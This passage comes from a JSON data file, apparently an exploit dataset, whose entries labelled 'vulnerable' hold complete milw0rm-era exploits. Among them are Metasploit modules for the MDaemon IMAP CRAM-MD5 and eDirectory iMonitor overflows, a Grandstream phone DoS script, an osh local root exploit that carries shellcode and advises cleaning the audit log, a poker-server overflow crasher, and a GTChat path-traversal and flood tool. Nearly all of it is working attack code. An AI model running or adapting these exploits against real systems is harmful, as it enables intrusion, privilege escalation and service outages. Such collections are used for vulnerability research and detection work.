#$s->Recv(2, 2);\n\n        #my $len = $s->Recv(2,2);\n\n        #$len = unpack ('n', $len);\n\n        #$s->Recv($len, $len);\n\n\t\n\n        $s->Send(\"\\x00\\x02\");\n\n\n\n        $self->PrintLine( \"[*] Sending final payload\" );\n\n\n\n        # pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode\n\n\tmy $crash = \"A\" x 0x20;\n\n\t$req = \"\\x00\\x24\" . $crash . pack('V', $target->[1]);\n\n        $s->Send($req);\n\n\t    \n\n\t$self->PrintLine(\"[*] Overflow request sent, sleeping for four seconds\");\n\n\tselect(undef, undef, undef, 4);\n\n\n\n\t$self->Handler($s);\n\n        return;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-12]",
795        "vulnerable": true
796    },
797    {
798        "exploit_id": 1151,
799        "content": "##\n\n# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $\n\n##\n\n\n\n##\n\n# This file is part of the Metasploit Framework and may be subject to\n\n# redistribution and commercial restrictions. Please see the Metasploit\n\n# Framework web site for more information on licensing and terms of use.\n\n# http://metasploit.com/framework/\n\n##\n\n\n\nrequire 'msf/core'\n\n\n\nclass Metasploit3 < Msf::Exploit::Remote\n\n\tRank = GreatRanking\n\n\n\n\tinclude Msf::Exploit::Remote::Imap\n\n\n\n\tdef initialize(info = {})\n\n\t\tsuper(update_info(info,\n\n\t\t\t'Name'           => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',\n\n\t\t\t'Description'    => %q{\n\n\t\t\t\t\tThis module exploits a buffer overflow in the CRAM-MD5\n\n\t\t\t\tauthentication of the MDaemon IMAP service. This\n\n\t\t\t\tvulnerability was discovered by Muts.\n\n\t\t\t},\n\n\t\t\t'Author'         => [ 'anonymous' ],\n\n\t\t\t'License'        => BSD_LICENSE,\n\n\t\t\t'Version'        => '$Revision: 9583 $',\n\n\t\t\t'References'     =>\n\n\t\t\t\t[\n\n\t\t\t\t\t[ 'CVE', '2004-1520'],\n\n\t\t\t\t\t[ 'OSVDB', '11838'],\n\n\t\t\t\t\t[ 'BID', '11675'],\n\n\t\t\t\t],\n\n\t\t\t'Privileged'     => true,\n\n\t\t\t'DefaultOptions' =>\n\n\t\t\t\t{\n\n\t\t\t\t\t'EXITFUNC' => 'process',\n\n\t\t\t\t},\n\n\t\t\t'Payload'        =>\n\n\t\t\t\t{\n\n\t\t\t\t\t'Space'    => 500,\n\n\t\t\t\t\t'BadChars' => \"\\x00\",\n\n\t\t\t\t\t'StackAdjustment' => -3500,\n\n\t\t\t\t},\n\n\t\t\t'Platform'       => 'win',\n\n\t\t\t'Targets'        =>\n\n\t\t\t\t[\n\n\t\t\t\t\t[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],\n\n\t\t\t\t],\n\n\t\t\t'DisclosureDate' => 'Nov 12 2004',\n\n\t\t\t'DefaultTarget' => 0))\n\n\tend\n\n\n\n\tdef exploit\n\n\t\tconnect\n\n\n\n\t\tprint_status(\"Asking for CRAM-MD5 authentication...\")\n\n\t\tsock.put(\"a001 authenticate cram-md5\\r\\n\")\n\n\t\tres = sock.get_once\n\n\n\n\n\n\t\tprint_status(\"Received CRAM-MD5 answer: #{res.chomp}\")\n\n\t\t# Magic no return-address exploitation ninjaness!\n\n\t\tbuf = 'AAAA' + payload.encoded + make_nops(258) + \"\\xe9\\x05\\xfd\\xff\\xff\"\n\n\t\treq = Rex::Text.encode_base64(buf) + \"\\r\\n\"\n\n\t\tsock.put(req)\n\n\t\tres = sock.get_once\n\n\n\n\t\tprint_status(\"Received authentication reply: #{res.chomp}\")\n\n\t\tprint_status(\"Sending LOGOUT to close the thread and trigger an exception\")\n\n\t\tsock.put(\"a002 LOGOUT\\r\\n\")\n\n\t\tres = sock.get_once\n\n\n\n\t\tprint_status(\"Received LOGOUT reply: #{res.chomp}\")\n\n\t\tselect(nil,nil,nil,1)\n\n\n\n\t\thandler\n\n\t\tdisconnect\n\n\tend\n\n\n\nend",
800        "vulnerable": true
801    },
802    {
803        "exploit_id": 1152,
804        "content": "##\n\n# This file is part of the Metasploit Framework and may be redistributed\n\n# according to the licenses defined in the Authors field below. In the\n\n# case of an unknown or missing license, this file defaults to the same\n\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n\n# version of the Framework can always be obtained from metasploit.com.\n\n##\n\n\n\npackage Msf::Exploit::edirectory_imonitor;\n\nuse strict;\n\nuse base \"Msf::Exploit\";\n\nuse Pex::Text;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info =\n\n  {\n\n\t'Name'    => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',\n\n\t'Version' => '$Revision: 1.2 $',\n\n\t'Authors' => [ 'anonymous' ],\n\n\t  \n\n\t'Arch'  => [ 'x86' ],\n\n\t'OS'    => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],\n\n\t'Priv'  => 1,\n\n\n\n\t'AutoOpts'  =>  { 'EXITFUNC' => 'thread' },\n\n\n\n\t'UserOpts'  =>\n\n\t  {\n\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\n\t\t'RPORT' => [1, 'PORT', 'The target port', 8008 ],\n\n\t\t'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\n\n\t\t'SSL'   => [0, 'BOOL', 'Use SSL'],\n\n\t  },\n\n\n\n\t'Payload' =>\n\n\t  {\n\n\t\t'Space'     => 0x1036,\n\n\t\t'BadChars'  => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\",\n\n\t\t'Keys' \t    => ['+ws2ord'],\n\n\t  },\n\n\n\n\t'Description'  => Pex::Text::Freeform(qq{\n\n\t\tThis module exploits a stack overflow in eDirectory 8.7.3 iMonitor\n\n\tservice. This vulnerability was discovered by Peter Winter-Smith of \n\n\tNGSSoftware.\n\n\n\n}),\n\n\n\n\t'Refs'  =>\n\n\t  [\n\n\t  \t['OSVDB', '18703'],\n\n\t\t['CVE',   '2005-2551'],\n\n\t\t['BID',   '14548'],\n\n\t  ],\n\n\n\n\t'Targets' =>\n\n\t  [\n\n\t\t[ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret\n\n\t  ],\n\n\n\n\t'Keys'  => ['imonitor'],\n\n  };\n\n\n\nsub new {\n\n\tmy $class = shift;\n\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n\n}\n\n\n\nsub Exploit {\n\n\tmy $self        = shift;\n\n\tmy $target_host = $self->GetVar('RHOST');\n\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $target_idx  = $self->GetVar('TARGET');\n\n\tmy $shellcode   = $self->GetVar('EncodedPayload')->Payload;\n\n\tmy $target      = $self->Targets->[$target_idx];\n\n\n\n\t$self->PrintLine( \"[*] Attempting to exploit \" . $target->[0] );\n\n\n\n\tmy $s = Msf::Socket::Tcp->new(\n\n\t\t'PeerAddr'  => $target_host,\n\n\t\t'PeerPort'  => $target_port,\n\n\t\t'SSL'      => $self->GetVar('SSL'),\n\n\t  );\n\n\n\n\tif ( $s->IsError ) {\n\n\t\t$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );\n\n\t\treturn;\n\n\t}\n\n\n\n\t# pop/pop/ret in ndsimon.dlm on our jump to our shellcode\n\n\tmy $req = $shellcode . \"\\x90\\x90\\xeb\\x04\" . pack('V', $target->[1]) . \"\\xe9\\xbd\\xef\\xff\\xff\" . (\"B\" x 0xD0);\n\n\tmy $request =\n\n\t  \"GET /nds/$req HTTP/1.1\\r\\n\".\n\n\t  \"Accept: */*\\r\\n\".\n\n\t  \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\n\".\n\n\t  \"Host: $target_host:$target_port\\r\\n\".\n\n\t  \"Connection: Close\\r\\n\".\n\n\t  \"\\r\\n\";\n\n\n\n\t$s->Send($request);\n\n\n\n\t$self->PrintLine(\"[*] Overflow request sent, sleeping for four seconds\");\n\n\tselect(undef, undef, undef, 4);\n\n\n\n\t$self->Handler($s);\n\n\treturn;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-12]",
805        "vulnerable": true
806    },
807    {
808        "exploit_id": 1153,
809        "content": "#!/usr/bin/perl\n\n#\n\nuse IO::Socket;\n\nuse Term::ANSIColor;\n\n\n\n############################ U S A G E ###################################\n\nsystem (\"clear\");\n\nprint \"\\nGrandstream BT101/BT102 DoS\\n\";\n\nprint \"written by pierre kroma (kroma\\@syss.de)\\n\\n\";\n\n\n\nif (!$ARGV[2]){\n\nprint qq~\n\nUsage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}\n\n\n\n\t<ip-addr>  = ;-)\n\n\t<udp-port> = 5060\n\n\n\n\t-r = 'reboot' \tthe Grandstream BT 101/102\n\n\t-s = 'shutdown' the Grandstream BT 101/102\n\n\n\n~; exit;}\n\n################################## D E F I N I T I O N S####################\n\n\n\n$victim = $ARGV[0];\n\n$port = $ARGV[1];\n\n$option = $ARGV[2];\n\n\n\nif ( $option == 'r' || $option == 'R' )\n\n{\t$request= 'k'x65534;}\n\n\n\nif ( $option == 's' || $option == 'S' )\n\n{\t$request= 'p'x65535;}\n\nelse\n\n{\tprint \"Wrong parameter - try it again\";\n\n\texit;\n\n}\n\n\n\n\n\n# ping the remote device\n\nprint color 'bold blue';\n\nprint \"\\nping the remote device $victim\\n\";\n\nprint color 'reset';\n\nsystem(\"ping -c 3 $victim\");\n\n\n\nprint color 'bold red';\n\nprint \"\\n Wait ... \\n\\n\\n\";\n\nprint color 'reset';\n\n$sox = IO::Socket::INET->new(Proto=>\"udp\",PeerPort=>\"$port\",PeerAddr=>\"$victim\");\n\n\n\nprint $sox $request;\n\nsleep 1;\n\nclose $sox;\n\n\n\n# ping the remote device\n\nprint color 'bold blue';\n\nprint \"ping the remote device $victim again\\n\";\n\nprint color 'reset';\n\nsystem(\"ping -c 3 $victim\");\n\n\n\n# milw0rm.com [2005-08-12]",
810        "vulnerable": true
811    },
812    {
813        "exploit_id": 1154,
814        "content": "# You must be group(operator) for permissions /str0ke\n\n\n\n#!/usr/bin/perl \n\n#######################################################################\n\n#\n\n# OSH 1.7 Exploit #2 (Gonna bang away at this until it's removed ;-)\n\n#\n\n# EDUCATIONAL purposes only.... :-)\n\n#\n\n# by Charles Stevenson (core) <core@bokeoa.com>\n\n#\n\n# Description:\n\n# The Operator Shell (Osh) is a setuid root, security enhanced, restricted\n\n# shell. It allows the administrator to carefully limit the access of special\n\n# commands and files to the users whose duties require their use, while\n\n# at the same time automatically maintaining audit records. The configuration\n\n# file for Osh contains an administrator defined access profile for each\n\n# authorized user or group.\n\n#\n\n# Problem (discovered by Solar Eclipse):\n\n#\n\n# handlers.c:364\n\n#\n\n#    char temp3[255];\n\n#\n\n#    if (*file!='/') {\n\n#      getcwd(temp3, MAXPATHLEN);\n\n#      strcat(temp3,\"/\");\n\n#      strcat(temp3,file);\n\n#    }\n\n#\n\n#    ...\n\n#\n\n#    \"If the length of the current working directory plus the length of the\n\n#    file name is longer than 255 bytes, there will be a buffer overflow in\n\n#    temp3[]. The size limit of the current direcory is MAXPATHLEN, which is\n\n#    defined as 1024 on modern Linux systems. The limit for the file name is\n\n#    MAXFNAME, defined as 32 in struct.h:116.\"\n\n#\n\n#    \"This code is in the writable() function, which is called by the handlers\n\n#    for built-in cp, vi, rm and test commands, as well as the redirect\n\n#    function.\" -- Solar Eclipse\n\n#\n\n# Risk: Medium since user would have to be in the operator group which\n\n#       the admin would have to grant explicitly and I assume would be\n\n#       a trustworthy individual ;-)\n\n#\n\n# Solution:\n\n# apt-get --purge remove osh\n\n#\n\n# greetz to solar eclipse, nemo, andrewg, cnn, arcanum, mercy, amnesia, \n\n# banned-it, capsyl, sloth, redsand, KF, akt0r, MRX, salvia, truthix, ...\n\n#\n\n# irc.pulltheplug.org (#social)\n\n# 0dd: much <3 & respect\n\n# \n\n# 08/12/05 - PoC causes segv with 0x41414141 eip\n\n# 08/16/05 - PoC _exit(0) ... need shellcode to get past char filters\n\n# 08/16/04 - Later that night... or morning... ROOTSHELL!! Woot! PTP joint\n\n#            effort on the shellcode.\n\n#\n\n# I still find it hard to imagine that anyone would use osh\n\n# The code is basically beyond repair. Sudo is better.... :-)\n\n#\n\n# Don't forget to clean /var/log/osh.log\n\n#\n\n#######################################################################\n\n#               PRIVATE - DO NOT DISTRIBUTE - PRIVATE                 #\n\n#######################################################################\n\n\n\n\n\n# Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy..\n\n$sc = \"\\x90\" x (511-45) .\n\n\n\n# 45 bytes by anthema. 0xff less \n\n\"\\x89\\xe6\" . # /* movl %esp, %esi */ \n\n\"\\x83\\xc6\\x30\" . # /* addl $0x30, %esi */ \n\n\"\\xb8\\x2e\\x62\\x69\\x6e\" . # /bin /* movl $0x6e69622e, %eax */ \n\n\"\\x40\" . # /* incl %eax */ \n\n\"\\x89\\x06\" . # /* movl %eax, (%esi) */ \n\n\"\\xb8\\x2e\\x73\\x68\\x21\" . # /sh /* movl $0x2168732e, %eax */ \n\n\"\\x40\" . # /* incl %eax */ \n\n\"\\x89\\x46\\x04\" . # /* movl %eax, 0x04(%esi) */ \n\n\"\\x29\\xc0\" . # /* subl %eax, %eax */ \n\n\"\\x88\\x46\\x07\" . # /* movb %al, 0x07(%esi) */ \n\n\"\\x89\\x76\\x08\" . # /* movl %esi, 0x08(%esi) */ \n\n\"\\x89\\x46\\x0c\" . # /* movl %eax, 0x0c(%esi) */ \n\n\"\\xb0\\x0b\" . # /* movb $0x0b, %al */ \n\n\"\\x87\\xf3\" . # /* xchgl %esi, %ebx */ \n\n\"\\x8d\\x4b\\x08\" . # /* leal 0x08(%ebx), %ecx */ \n\n\"\\x8d\\x53\\x0c\" . # /* leal 0x0c(%ebx), %edx */ \n\n\"\\xcd\\x80\"; # /* int $0x80 */ \n\n\n\n# 0day shellcodez....\n\n#\n\n# Nemo's idea... PTP #social collaborative effort.  Searches the stack\n\n# until it finds a nopsled and executes the shellcode\n\n$ptp_sc = \n\n\n\n\"\\x61\\x54\\x59\\x81\\x39\\x90\\x90\" .\n\n\"\\x90\\x90\\x74\\x02\\xeb\\xf3\\x54\" .\n\n\"\\xc3\";\n\n\n\n# _exit(0);\n\n#\"\\x31\\xc0\\x31\\xdb\\x40\\xcd\\x80\";\n\n\n\nprint \"\\nOperator Shell (osh) 1.7-13 root exploit\\n\";\n\nprint \"----------------------------------------------\\n\";\n\nprint \"Written by Charles Stevenson <core\\@bokeoa.com>\\n\";\n\nprint \"This exploit would not have been near as fun without\\n\";\n\nprint \"the pulltheplug.org community.\\n\\n\";\n\n\n\n# Clear out the environment. \n\nforeach $key (keys %ENV) { delete $ENV{$key}; } \n\n\n\n# Setup simple env\n\n$ENV{\"HELLCODE\"} = \"$sc\"; \n\n$ENV{\"TERM\"} = \"linux\"; \n\n$ENV{\"PATH\"} = \"/usr/local/bin:/usr/bin:/bin\"; \n\n\n\nchdir(\"/tmp/\");\n\n\n\n# Create the payload...\n\nmkdir(\"A\"x255,0755);\n\nchdir(\"A\"x255);\n\nmkdir(\"B\"x255,0755);\n\nchdir(\"B\"x255);\n\nmkdir(\"C\"x118,0755);\n\nchdir(\"C\"x118);\n\n\n\n#XXX: Return address can't have: 0x09 0x0a 0x20 0x22 0x24 0x26\n\n# (what made this fun)           0x3b 0x3c 0x3e 0x7c 0xff\n\n\n\n#$file = pack(\"l\",0xdeadbeef) . \"core\";\n\n#$file = pack(\"l\",0x804e36c) . \"core\";\n\n$file = pack(\"l\",0x804e36c) . $ptp_sc; # inputfp + 12\n\n\n\nsystem(\"touch '$file'\");\n\nsystem(\"/usr/sbin/osh test -w '$file'\");\n\n\n\nprint(\"cleaning up /tmp\\n\");\n\nchdir(\"../../../\");\n\nsystem(\"rm -rf AAAA*/\");\n\n\n\n# EOF\n\n\n\n# milw0rm.com [2005-08-16]",
815        "vulnerable": true
816    },
817    {
818        "exploit_id": 1156,
819        "content": "/*\n\n\n\nby Luigi Auriemma\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n\n\n#ifdef WIN32\n\n    #include <winsock.h>\n\n/*\n\n   Header file used for manage errors in Windows\n\n   It support socket and errno too\n\n   (this header replace the previous sock_errX.h)\n\n*/\n\n\n\n#include <string.h>\n\n#include <errno.h>\n\n\n\n\n\n\n\nvoid std_err(void) {\n\n    char    *error;\n\n\n\n    switch(WSAGetLastError()) {\n\n        case 10004: error = \"Interrupted system call\"; break;\n\n        case 10009: error = \"Bad file number\"; break;\n\n        case 10013: error = \"Permission denied\"; break;\n\n        case 10014: error = \"Bad address\"; break;\n\n        case 10022: error = \"Invalid argument (not bind)\"; break;\n\n        case 10024: error = \"Too many open files\"; break;\n\n        case 10035: error = \"Operation would block\"; break;\n\n        case 10036: error = \"Operation now in progress\"; break;\n\n        case 10037: error = \"Operation already in progress\"; break;\n\n        case 10038: error = \"Socket operation on non-socket\"; break;\n\n        case 10039: error = \"Destination address required\"; break;\n\n        case 10040: error = \"Message too long\"; break;\n\n        case 10041: error = \"Protocol wrong type for socket\"; break;\n\n        case 10042: error = \"Bad protocol option\"; break;\n\n        case 10043: error = \"Protocol not supported\"; break;\n\n        case 10044: error = \"Socket type not supported\"; break;\n\n        case 10045: error = \"Operation not supported on socket\"; break;\n\n        case 10046: error = \"Protocol family not supported\"; break;\n\n        case 10047: error = \"Address family not supported by protocol family\"; break;\n\n        case 10048: error = \"Address already in use\"; break;\n\n        case 10049: error = \"Can't assign requested address\"; break;\n\n        case 10050: error = \"Network is down\"; break;\n\n        case 10051: error = \"Network is unreachable\"; break;\n\n        case 10052: error = \"Net dropped connection or reset\"; break;\n\n        case 10053: error = \"Software caused connection abort\"; break;\n\n        case 10054: error = \"Connection reset by peer\"; break;\n\n        case 10055: error = \"No buffer space available\"; break;\n\n        case 10056: error = \"Socket is already connected\"; break;\n\n        case 10057: error = \"Socket is not connected\"; break;\n\n        case 10058: error = \"Can't send after socket shutdown\"; break;\n\n        case 10059: error = \"Too many references, can't splice\"; break;\n\n        case 10060: error = \"Connection timed out\"; break;\n\n        case 10061: error = \"Connection refused\"; break;\n\n        case 10062: error = \"Too many levels of symbolic links\"; break;\n\n        case 10063: error = \"File name too long\"; break;\n\n        case 10064: error = \"Host is down\"; break;\n\n        case 10065: error = \"No Route to Host\"; break;\n\n        case 10066: error = \"Directory not empty\"; break;\n\n        case 10067: error = \"Too many processes\"; break;\n\n        case 10068: error = \"Too many users\"; break;\n\n        case 10069: error = \"Disc Quota Exceeded\"; break;\n\n        case 10070: error = \"Stale NFS file handle\"; break;\n\n        case 10091: error = \"Network SubSystem is unavailable\"; break;\n\n        case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n\n        case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n\n        case 10071: error = \"Too many levels of remote in path\"; break;\n\n        case 11001: error = \"Host not found\"; break;\n\n        case 11002: error = \"Non-Authoritative Host not found\"; break;\n\n        case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n\n        case 11004: error = \"Valid name, no data record of requested type\"; break;\n\n        default: error = strerror(errno); break;\n\n    }\n\n    fprintf(stderr, \"\\nError: %s\\n\", error);\n\n    exit(1);\n\n}\n\n\n\n// inserted winerr.h /str0ke\n\n\n\n    #define close   closesocket\n\n    #define ONESEC  1000\n\n#else\n\n    #include <unistd.h>\n\n    #include <sys/socket.h>\n\n    #include <sys/types.h>\n\n    #include <arpa/inet.h>\n\n    #include <netinet/in.h>\n\n    #include <netdb.h>\n\n\n\n    #define ONESEC  1\n\n#endif\n\n\n\n\n\n\n\n#define VER     \"0.1\"\n\n#define PORT    17573\n\n#define TIMEOUT 5\n\n#define EIP     \"\\xde\\xc0\\xad\\xde\"\n\n#define BOF     \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"\\x4e\\xe6\\x40\\xbb\"  /* default exception handler sign [00515150] */ \\\n\n                EIP                 /* return address for the sprintf() bug      */ \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                EIP                 /* bypass exception handler */ \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\n\n                \"aaaa\\0\"\n\n\n\n\n\n\n\nvoid send_chmpoker(int sock, u_char *data, u_int len, u_int num1, u_int num2);\n\nint timeout(int sock);\n\nu_long resolv(char *host);\n\nvoid std_err(void);\n\n\n\n\n\n\n\nint main(int argc, char *argv[]) {\n\n    struct  sockaddr_in peer;\n\n    int     sd;\n\n    u_short port = PORT;\n\n\n\n#ifdef WIN32\n\n    WSADATA    wsadata;\n\n    WSAStartup(MAKEWORD(1,0), &wsadata);\n\n#endif\n\n\n\n\n\n    setbuf(stdout, NULL);\n\n\n\n    fputs(\"\\n\"\n\n        \"Chris Moneymaker's World Poker Championship 1.0 buffer-overflow \"VER\"\\n\"\n\n        \"by Luigi Auriemma\\n\"\n\n        \"e-mail: aluigi@autistici.org\\n\"\n\n        \"web:    http://aluigi.altervista.org\\n\"\n\n        \"\\n\", stdout);\n\n\n\n    if(argc < 2) {\n\n        printf(\"\\n\"\n\n            \"Usage: %s <host> [port(%d)]\\n\"\n\n            \"\\n\", argv[0], port);\n\n        exit(1);\n\n    }\n\n\n\n    if(argc > 2) port = atoi(argv[2]);\n\n\n\n    peer.sin_addr.s_addr = resolv(argv[1]);\n\n    peer.sin_port        = htons(port);\n\n    peer.sin_family      = AF_INET;\n\n\n\n    printf(\"- target   %s : %hu\\n\",\n\n        inet_ntoa(peer.sin_addr), port);\n\n\n\n    fputs(\"- check server: \", stdout);\n\n    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n    if(sd < 0) std_err();\n\n    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\n\n      < 0) std_err();\n\n\n\n    if(timeout(sd) < 0) {\n\n        fputs(\"\\nError: server doesn't seem to work, I have received no data\\n\\n\", stdout);\n\n        exit(1);\n\n    }\n\n    fputs(\"ok\\n\", stdout);\n\n\n\n    fputs(\"- send malformed data size\\n\", stdout);\n\n    send_chmpoker(sd, BOF, sizeof(BOF) - 1, 8, 3);\n\n\n\n    sleep(ONESEC);\n\n    close(sd);\n\n\n\n    fputs(\"- the server should be crashed, check it manually\\n\", stdout);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nvoid send_chmpoker(int sock, u_char *data, u_int len, u_int num1, u_int num2) {\n\n    u_char  head[12];   // part of data, a lazy solution\n\n\n\n    *(u_int *)(head)     = 0xdeadd001; // 02 and 03\n\n    *(u_int *)(head + 4) = len + 12;\n\n    send(sock, head, 8, 0);\n\n\n\n    *(u_int *)(head)     = num1;\n\n    *(u_int *)(head + 4) = len + 12;\n\n    *(u_int *)(head + 8) = num2;\n\n    send(sock, head, 12, 0);\n\n\n\n    send(sock, data, len, 0);\n\n}\n\n\n\n\n\n\n\nint timeout(int sock) {\n\n    struct  timeval tout;\n\n    fd_set  fd_read;\n\n    int     err;\n\n\n\n    tout.tv_sec = TIMEOUT;\n\n    tout.tv_usec = 0;\n\n    FD_ZERO(&fd_read);\n\n    FD_SET(sock, &fd_read);\n\n    err = select(sock + 1, &fd_read, NULL, NULL, &tout);\n\n    if(err < 0) std_err();\n\n    if(!err) return(-1);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nu_long resolv(char *host) {\n\n    struct hostent *hp;\n\n    u_long host_ip;\n\n\n\n    host_ip = inet_addr(host);\n\n    if(host_ip == INADDR_NONE) {\n\n        hp = gethostbyname(host);\n\n        if(!hp) {\n\n            printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\n\n            exit(1);\n\n        } else host_ip = *(u_long *)hp->h_addr;\n\n    }\n\n    return(host_ip);\n\n}\n\n\n\n\n\n\n\n#ifndef WIN32\n\n    void std_err(void) {\n\n        perror(\"\\nError\");\n\n        exit(1);\n\n    }\n\n#endif\n\n\n\n// milw0rm.com [2005-08-17]",
820        "vulnerable": true
821    },
822    {
823        "exploit_id": 1157,
824        "content": "#!/usr/bin/perl  \n\n\n\n use LWP::Simple;\n\n    \n\n if (@ARGV < 3) \n\n{ \n\n    print \"\\nUsage: $0 [server] [path] [mode] [count for DoS]\\n\"; \n\n    print \"sever -  URL chat\\n\"; \n\n    print \"path  -  path to chat.pl\\n\"; \n\n    print \"mode  -  poc or dos,\\n\"; \n\n    print \"                    poc - simple check without DoS and exit,\\n\"; \n\n    print \"                    dos - DoS, you must set count for requests in 4 argument.\\n\\n\";\n\n    exit (); \n\n}   \n\n    $DoS      =     \"dos\";\n\n    $POC      =     \"poc\"; \n\n    $server   =  $ARGV[0]; \n\n    $path     =  $ARGV[1]; \n\n    $mode     =  $ARGV[2]; \n\n    $count    =  $ARGV[3];\n\n    print qq(\n\n                                           ###################################\n\n                                           # GTChat <= 0.95 Alpha remote DoS #\n\n                                           #   tested on GTChat 0.95 Alpha   #\n\n                                           # (c)oded by x97Rang 2005 RST/GHC #\n\n                                           #    Respect: b1f, 1dt.w0lf, ed   #\n\n                                           ################################### );\n\n if ($mode eq $POC)\n\n{  \n\n    print \"\\n\\nTry read file /etc/resolv.conf, maybe remote system unix...\\n\";\n\n    $URL = sprintf(\"http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\\nHost: %s\\nAccept:*/*\\nConnection:close\\n\\n\",$server,$path,$server);  \n\n    $content = get \"$URL\";\n\n if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) \n\n{   print \"File read successfully, remote system is *nix and $server are VULNERABLE!\\n\"; exit(); }\n\n if ($content =~ /Fatal error/)\n\n{ \n\n    print \"File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\\n\"; \n\n    print \"=== OUTPUT ===============================================================================\\n\"; \n\n    print \"\\n$content\\n\"; \n\n    print \"=============================================================================== OUTPUT ===\\n\";\n\n    exit();\n\n}\n\n else { print \"Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\\n\"; }\n\n}\n\n if ($mode eq $DoS)\n\n{\n\n if (!($count)) { print \"\\nNeed count for DoS requests, you don't set it, exit...\\n\"; exit() }\n\n    print \"\\nSend $count DoS requests to $server...\\n\";\n\n   $URL = sprintf(\"http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\\nHost: %s\\nAccept:*/*\\nConnection:close\\n\\n\",$server,$path,$server);\n\n for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get \"$URL\"; }\n\n    print \"Done, packets sended.\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-08-18]",
825        "vulnerable": true
826    },
827    {
828        "exploit_id": 1158,
